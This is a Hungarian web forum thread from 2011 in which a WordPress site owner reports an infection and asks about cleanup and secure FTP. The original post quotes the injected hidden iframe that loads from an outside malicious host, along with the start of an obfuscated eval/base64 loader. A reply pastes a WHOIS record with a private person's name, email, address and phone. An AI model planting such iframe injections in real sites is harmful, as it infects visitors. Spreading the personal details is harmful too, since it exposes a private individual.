Valószínűleg Malware települt be az oldalamra
#1
Elküldve: 2011-03-03 - 01:16 AM
WP 3.0.5 oldal, aktuális mentésekor feltűnt, hogy van 2 furcsa file a főkönyvtárban.
Erre megnézem az index.php-t, és van a végén egy -szerintem- plusz sor:
?><iframe heigth="1" width="1" frameborder="0" src="http://alcobro.net/t.php?id=3415357"></iframe>
A két file pedig így kezdődött:
<? eval(gzuncompress(base64_decode(' és itt jött a sok kódolt adat...
Egyre gyanúsabb lett a dolog.
Az oldalamon egyébként semmi nem tűnt fel. Max egy kicsit lassú lett, de ezt a folyamatos bővítésnek tudtam be.
Theme: Constructor
Plugin: Akismet (kikapcsolva), All-in-one SEO, Azigen, Contact form 7, google-sitemap generator, Theme-my-login, wp e-commerce, wp-polls, yd-recent-posts-widget (kikapcsolva)
Az index.php-t a legutóbbi mentésére lecseréltem.
Tapasztalt szakik: Az adatbázisomba is belemászhatott? Mindent újra felépíteni elég macera... Főleg az e-commerce miatt.
A Security Scan-t egy másik oldalamon már kipróbáltam, az oldal lehalt tőle.
FTP jelszót már módosítottam.
+1 kérdés, mi számít biztonságos FTP-zésnek? Winscp, Filezilla... ?
#2
Elküldve: 2011-03-03 - 14:15 PM
Domain Name: ALCOBRO.NET
Registrant:
Private Person
Andrej A Verba (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
ulica Universitetskaya 96a
Kemerovo
,200133
RU
Tel. +7.322127925004
Creation Date: 15-Nov-2010
Expiration Date: 15-Nov-2011
Domain servers in listed order:
ns3.everydns.net
ns4.everydns.net
Administrative Contact:
Private Person
Andrej A Verba (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
ulica Universitetskaya 96a
Kemerovo
,200133
RU
Tel. +7.322127925004
Technical Contact:
Private Person
Andrej A Verba (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
ulica Universitetskaya 96a
Kemerovo
,200133
RU
Tel. +7.322127925004
Billing Contact:
Private Person
Andrej A Verba (sdqazxswedcvfrtgbnhyujmkiol@gmail.com)
ulica Universitetskaya 96a
Kemerovo
,200133
RU
Tel. +7.322127925004
I Love U Russia..
#3
Elküldve: 2011-03-03 - 14:37 PM
http://blog.vivekjishtu.com/
http://forum.joomla....f=432&p=2428498
Kicsit utánanéztem:
a domain ahova a dolog mutat a gogax.com-on hostoldóik..
dedikált gépeket adnak bérbe. van bejelentő címük:
abuse@gogax.com
...
pár percet érdemes az ilyesmikre rászánni.. mondjuk ahogy elnéztem mindenféle bejelentő oldalakon 100+ náluk üzemelő offending ip van kb..
#4
Elküldve: 2011-03-03 - 21:24 PM
Szerinted az adatbázis is fertőződött?
Újra kell építenem mindent?
Mi számít biztonságos FTP-nek?
#5
Elküldve: 2011-03-04 - 15:29 PM
#6
Elküldve: 2011-03-04 - 15:42 PM
egyébként mintha még mindig nem tudnánk, hogy melyik lapról is van szó pontosan...
#7
Elküldve: 2011-03-04 - 17:30 PM
hgrg direktben kért és kapott infókat.
Pl. www.napelemguru.hu
#8
Elküldve: 2011-03-04 - 19:10 PM
A wp-admin könyvtárban levő index.php-t ugyanígy kiegészítette a saját kódjával.
Létrehozott a főkönyvtárban és a wp-admin könyvtárban is .htaccess file-t.
Fura, de a főkönyvtárban is létrejött egy virused.zip, valamint egy rejtett .log könyvtár, ahol temérdek html file van.
Úgy néz ki az adatbázist nem bántotta.
#9
Elküldve: 2011-03-04 - 19:15 PM
#10
Elküldve: 2011-03-05 - 00:10 AM
#11
Elküldve: 2011-03-05 - 01:28 AM
A többi oldalról már úgy tűnik leirtottam az "aranyost", most már sorra kerítem ezt is.
Már csak 1 kérdésem maradt: Mi az ajánlott, biztonságos FTP javaslat?
Már nem merek semmilyen jelszót eltároltatni a böngészővel, az FTP programokkal, de azt nem tudom, hogy a legutóbbi munkamenetről marad-e valamilyen nyom. Mert akkor 1 oldal mindig nyitott könyv lesz az aktuális támadónak.
#12
Elküldve: 2011-03-05 - 01:34 AM
hogy miért? mert különben nem lesz titkosított az átvitel, FTP eseténa jelszó plaintextben megy át..
#13
Elküldve: 2011-03-05 - 12:39 PM
#14
Elküldve: 2011-03-05 - 13:59 PM
ha vírusos gépről kapcsolódsz akkor elszedhetik a jelszavadat... ez ilyen egyszerű..
csak olyan gépről dolgozz amiben megbízol..
#15
Elküldve: 2011-03-05 - 23:00 PM
Ennek ellenére történtek ezek az esetek.
Az első alkalommal felvettem a kapcsolatot a NOD32 forgalmazóival. Távirányítással (2*is) próbálta megtalálni a vírust, ami nem sikerült.
Ekkor telepítettünk egy web naplózó programot, ami valószínűsített egy fertőzést.
Ezt nekem kellett leszednem a gépről, mert egyik program sem azonosította be. A file még mindig ott van egy spec könyvtárban a gépemen, de a közben 10-12 alkalommal frissített NOD32 sem ismeri még fel.
Ennyivel járnak előbb az írók mint az irtók.
#16
Elküldve: 2011-03-05 - 23:14 PM
#17
Elküldve: 2011-03-06 - 08:27 AM
#18
Elküldve: 2011-03-06 - 16:55 PM
#19
Elküldve: 2011-03-06 - 21:29 PM
#20
Elküldve: 2011-03-06 - 21:52 PM
1 felhasználó olvassa ezt a témát.
0 felhasználó, 1 vendég, 0 anonim felhasználó














